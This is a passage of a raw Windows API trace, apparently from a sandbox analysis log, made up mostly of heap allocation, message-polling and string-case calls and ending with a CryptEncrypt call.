lpMsg=0x8ced58) returned 0 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0122.653] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0122.654] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0122.654] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0122.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0122.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0122.655] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0122.655] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0122.655] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa258 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a740d0 [0122.655] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0122.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0122.656] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0122.656] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0122.656] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0122.657] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a740d0 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0122.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0122.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0122.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0122.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0122.658] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa408 [0122.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0122.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.658] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0122.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0122.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abeb70 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.661] CryptEncrypt (in: hKey=0x9a4900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7ba2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7ba8) returned 1 [0122.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.662] 